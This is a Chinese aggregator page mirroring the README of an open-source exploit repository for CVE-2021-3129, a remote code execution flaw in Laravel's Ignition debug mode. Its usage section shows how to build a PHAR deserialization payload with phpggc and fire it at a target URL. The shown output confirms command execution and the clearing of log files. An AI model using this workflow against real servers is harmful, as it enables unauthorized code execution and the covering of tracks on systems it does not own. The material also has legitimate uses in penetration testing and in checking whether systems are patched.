• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号
登陆 注册
描述文字

ambionics/laravel-exploits: Exploit for CVE-2021-3129

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

ambionics/laravel-exploits

开源软件地址(OpenSource Url):

https://github.com/ambionics/laravel-exploits

开源编程语言(OpenSource Language):

Python 100.0%

开源软件介绍(OpenSource Introduction):

laravel-exploits

Exploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce

Usage

$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared

鲜花
握手
雷人
路过
鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
More+
上一篇:
stevenyangecho/laravel-u-editor: UEditor for laravel5. Support i18n. UEditor is ...发布时间:2022-07-09
下一篇:
cviebrock/sequel-pro-laravel-export: A Sequel Pro / Sequel Ace bundle to generat ...发布时间:2022-07-09
热门推荐
More+
热门话题
More+
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap